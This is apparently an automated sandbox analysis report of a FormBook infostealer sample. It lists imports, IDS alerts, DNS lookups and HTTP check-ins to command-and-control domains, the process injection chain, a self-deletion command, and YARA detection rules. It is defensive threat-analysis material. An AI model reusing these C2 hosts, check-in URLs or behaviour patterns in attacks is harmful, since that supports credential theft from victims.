          RT_GROUP_ICON0x10e0800x76dataEnglishGreat Britain0.6610169491525424
          RT_GROUP_ICON0x10e0f80x14dataEnglishGreat Britain1.25
          RT_GROUP_ICON0x10e10c0x14dataEnglishGreat Britain1.15
          RT_GROUP_ICON0x10e1200x14dataEnglishGreat Britain1.25
          RT_VERSION0x10e1340xdcdataEnglishGreat Britain0.6181818181818182
          RT_MANIFEST0x10e2100x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

          Imports

          DLLImport
          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
          PSAPI.DLLGetProcessMemoryInfo
          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
          UxTheme.dllIsThemeActive
          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishGreat Britain

          Network Behavior

          Suricata IDS Alerts

          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
          2024-08-07T12:47:40.875845+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14973680192.168.2.465.21.196.90
          2024-08-07T12:49:42.895880+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14974080192.168.2.4213.186.33.5
          2024-08-07T12:51:05.923753+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14974180192.168.2.4104.18.24.121
          2024-08-07T12:46:56.400874+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14973980192.168.2.4185.199.108.153
          2024-08-07T12:48:01.173402+0200TCP2031453ET MALWARE FormBook CnC Checkin (GET)14973880192.168.2.466.235.200.145

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 7, 2024 12:47:40.370599985 CEST4973680192.168.2.465.21.196.90
          Aug 7, 2024 12:47:40.376116991 CEST804973665.21.196.90192.168.2.4
          Aug 7, 2024 12:47:40.376344919 CEST4973680192.168.2.465.21.196.90
          Aug 7, 2024 12:47:40.376432896 CEST4973680192.168.2.465.21.196.90
          Aug 7, 2024 12:47:40.382095098 CEST804973665.21.196.90192.168.2.4
          Aug 7, 2024 12:47:40.869812012 CEST4973680192.168.2.465.21.196.90
          Aug 7, 2024 12:47:40.875582933 CEST804973665.21.196.90192.168.2.4
          Aug 7, 2024 12:47:40.875844955 CEST4973680192.168.2.465.21.196.90
          Aug 7, 2024 12:48:00.668325901 CEST4973880192.168.2.466.235.200.145
          Aug 7, 2024 12:48:00.673918009 CEST804973866.235.200.145192.168.2.4
          Aug 7, 2024 12:48:00.674156904 CEST4973880192.168.2.466.235.200.145
          Aug 7, 2024 12:48:00.674156904 CEST4973880192.168.2.466.235.200.145
          Aug 7, 2024 12:48:00.684935093 CEST804973866.235.200.145192.168.2.4
          Aug 7, 2024 12:48:01.166892052 CEST4973880192.168.2.466.235.200.145
          Aug 7, 2024 12:48:01.172947884 CEST804973866.235.200.145192.168.2.4
          Aug 7, 2024 12:48:01.173402071 CEST4973880192.168.2.466.235.200.145

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 7, 2024 12:47:40.293159962 CEST5707453192.168.2.41.1.1.1
          Aug 7, 2024 12:47:40.369519949 CEST53570741.1.1.1192.168.2.4
          Aug 7, 2024 12:48:00.636111975 CEST6419153192.168.2.41.1.1.1
          Aug 7, 2024 12:48:00.667459965 CEST53641911.1.1.1192.168.2.4
          Aug 7, 2024 12:48:20.746228933 CEST5643253192.168.2.41.1.1.1
          Aug 7, 2024 12:48:20.756443977 CEST53564321.1.1.1192.168.2.4
          Aug 7, 2024 12:49:01.578761101 CEST5495853192.168.2.41.1.1.1
          Aug 7, 2024 12:49:01.744726896 CEST53549581.1.1.1192.168.2.4
          Aug 7, 2024 12:49:21.948733091 CEST5452953192.168.2.41.1.1.1
          Aug 7, 2024 12:49:22.117286921 CEST53545291.1.1.1192.168.2.4
          Aug 7, 2024 12:49:42.339297056 CEST5246653192.168.2.41.1.1.1
          Aug 7, 2024 12:49:42.380734921 CEST53524661.1.1.1192.168.2.4
          Aug 7, 2024 12:50:02.921076059 CEST5675753192.168.2.41.1.1.1
          Aug 7, 2024 12:50:02.943342924 CEST53567571.1.1.1192.168.2.4
          Aug 7, 2024 12:50:23.371768951 CEST5853353192.168.2.41.1.1.1
          Aug 7, 2024 12:50:23.623850107 CEST53585331.1.1.1192.168.2.4
          Aug 7, 2024 12:50:43.762511015 CEST5094853192.168.2.41.1.1.1
          Aug 7, 2024 12:50:44.016607046 CEST53509481.1.1.1192.168.2.4
          Aug 7, 2024 12:51:04.724073887 CEST4960153192.168.2.41.1.1.1
          Aug 7, 2024 12:51:05.414748907 CEST53496011.1.1.1192.168.2.4
          Aug 7, 2024 12:51:25.433774948 CEST6319853192.168.2.41.1.1.1
          Aug 7, 2024 12:51:25.758047104 CEST53631981.1.1.1192.168.2.4

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 7, 2024 12:47:40.293159962 CEST192.168.2.41.1.1.10x19acStandard query (0)www.00050591.xyzA (IP address)IN (0x0001)false
          Aug 7, 2024 12:48:00.636111975 CEST192.168.2.41.1.1.10x233cStandard query (0)www.californiacurrentelectric.comA (IP address)IN (0x0001)false
          Aug 7, 2024 12:48:20.746228933 CEST192.168.2.41.1.1.10x950eStandard query (0)www.b2vvuc00.sbsA (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:01.578761101 CEST192.168.2.41.1.1.10xc4f1Standard query (0)www.susansellsmarin.comA (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:21.948733091 CEST192.168.2.41.1.1.10x7bd4Standard query (0)www.urbanholidayz.comA (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:42.339297056 CEST192.168.2.41.1.1.10x6123Standard query (0)www.batremake.comA (IP address)IN (0x0001)false
          Aug 7, 2024 12:50:02.921076059 CEST192.168.2.41.1.1.10xbc4fStandard query (0)www.crucka.xyzA (IP address)IN (0x0001)false
          Aug 7, 2024 12:50:23.371768951 CEST192.168.2.41.1.1.10x23b8Standard query (0)www.tech-with-thulitha.siteA (IP address)IN (0x0001)false
          Aug 7, 2024 12:50:43.762511015 CEST192.168.2.41.1.1.10x3981Standard query (0)www.fostertv.netA (IP address)IN (0x0001)false
          Aug 7, 2024 12:51:04.724073887 CEST192.168.2.41.1.1.10x3a15Standard query (0)www.p-afactorysale.shopA (IP address)IN (0x0001)false
          Aug 7, 2024 12:51:25.433774948 CEST192.168.2.41.1.1.10x4ea0Standard query (0)www.arthemis-168bet.siteA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 7, 2024 12:47:40.369519949 CEST1.1.1.1192.168.2.40x19acNo error (0)www.00050591.xyz00050591.xyzCNAME (Canonical name)IN (0x0001)false
          Aug 7, 2024 12:47:40.369519949 CEST1.1.1.1192.168.2.40x19acNo error (0)00050591.xyz65.21.196.90A (IP address)IN (0x0001)false
          Aug 7, 2024 12:48:00.667459965 CEST1.1.1.1192.168.2.40x233cNo error (0)www.californiacurrentelectric.comcaliforniacurrentelectric.comCNAME (Canonical name)IN (0x0001)false
          Aug 7, 2024 12:48:00.667459965 CEST1.1.1.1192.168.2.40x233cNo error (0)californiacurrentelectric.com66.235.200.145A (IP address)IN (0x0001)false
          Aug 7, 2024 12:48:20.756443977 CEST1.1.1.1192.168.2.40x950eName error (3)www.b2vvuc00.sbsnonenoneA (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:01.744726896 CEST1.1.1.1192.168.2.40xc4f1Name error (3)www.susansellsmarin.comnonenoneA (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:22.117286921 CEST1.1.1.1192.168.2.40x7bd4No error (0)www.urbanholidayz.comkevintomc.github.ioCNAME (Canonical name)IN (0x0001)false
          Aug 7, 2024 12:49:22.117286921 CEST1.1.1.1192.168.2.40x7bd4No error (0)kevintomc.github.io185.199.108.153A (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:22.117286921 CEST1.1.1.1192.168.2.40x7bd4No error (0)kevintomc.github.io185.199.109.153A (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:22.117286921 CEST1.1.1.1192.168.2.40x7bd4No error (0)kevintomc.github.io185.199.110.153A (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:22.117286921 CEST1.1.1.1192.168.2.40x7bd4No error (0)kevintomc.github.io185.199.111.153A (IP address)IN (0x0001)false
          Aug 7, 2024 12:49:42.380734921 CEST1.1.1.1192.168.2.40x6123No error (0)www.batremake.com213.186.33.5A (IP address)IN (0x0001)false
          Aug 7, 2024 12:50:02.943342924 CEST1.1.1.1192.168.2.40xbc4fName error (3)www.crucka.xyznonenoneA (IP address)IN (0x0001)false
          Aug 7, 2024 12:50:23.623850107 CEST1.1.1.1192.168.2.40x23b8Server failure (2)www.tech-with-thulitha.sitenonenoneA (IP address)IN (0x0001)false
          Aug 7, 2024 12:50:44.016607046 CEST1.1.1.1192.168.2.40x3981Name error (3)www.fostertv.netnonenoneA (IP address)IN (0x0001)false
          Aug 7, 2024 12:51:05.414748907 CEST1.1.1.1192.168.2.40x3a15No error (0)www.p-afactorysale.shop104.18.24.121A (IP address)IN (0x0001)false
          Aug 7, 2024 12:51:25.758047104 CEST1.1.1.1192.168.2.40x4ea0No error (0)www.arthemis-168bet.sitearthemis-168bet.siteCNAME (Canonical name)IN (0x0001)false
          Aug 7, 2024 12:51:25.758047104 CEST1.1.1.1192.168.2.40x4ea0No error (0)arthemis-168bet.site84.32.84.32A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • www.00050591.xyz
          • www.californiacurrentelectric.com

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.44973665.21.196.90802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Aug 7, 2024 12:47:40.376432896 CEST154OUTGET /jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp HTTP/1.1
          Host: www.00050591.xyz
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.44973866.235.200.145802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Aug 7, 2024 12:48:00.674156904 CEST171OUTGET /jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp HTTP/1.1
          Host: www.californiacurrentelectric.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:06:46:59
          Start date:07/08/2024
          Path:C:\Users\user\Desktop\8t1uarSZFV.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\8t1uarSZFV.exe"
          Imagebase:0xfa0000
          File size:1'118'208 bytes
          MD5 hash:14876F2AECBF08493108D81F260BFE7A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low
          Has exited:true

          General

          Target ID:1
          Start time:06:47:00
          Start date:07/08/2024
          Path:C:\Windows\SysWOW64\svchost.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\8t1uarSZFV.exe"
          Imagebase:0xf90000
          File size:46'504 bytes
          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:true

          General

          Target ID:2
          Start time:06:47:02
          Start date:07/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff72b770000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:3
          Start time:06:47:04
          Start date:07/08/2024
          Path:C:\Windows\SysWOW64\netsh.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\netsh.exe"
          Imagebase:0x1560000
          File size:82'432 bytes
          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:false

          General

          Target ID:4
          Start time:06:47:07
          Start date:07/08/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
          Imagebase:0x240000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:06:47:07
          Start date:07/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7699e0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:3.4%
            Dynamic/Decrypted Code Coverage:0.4%
            Signature Coverage:3%
            Total number of Nodes:2000
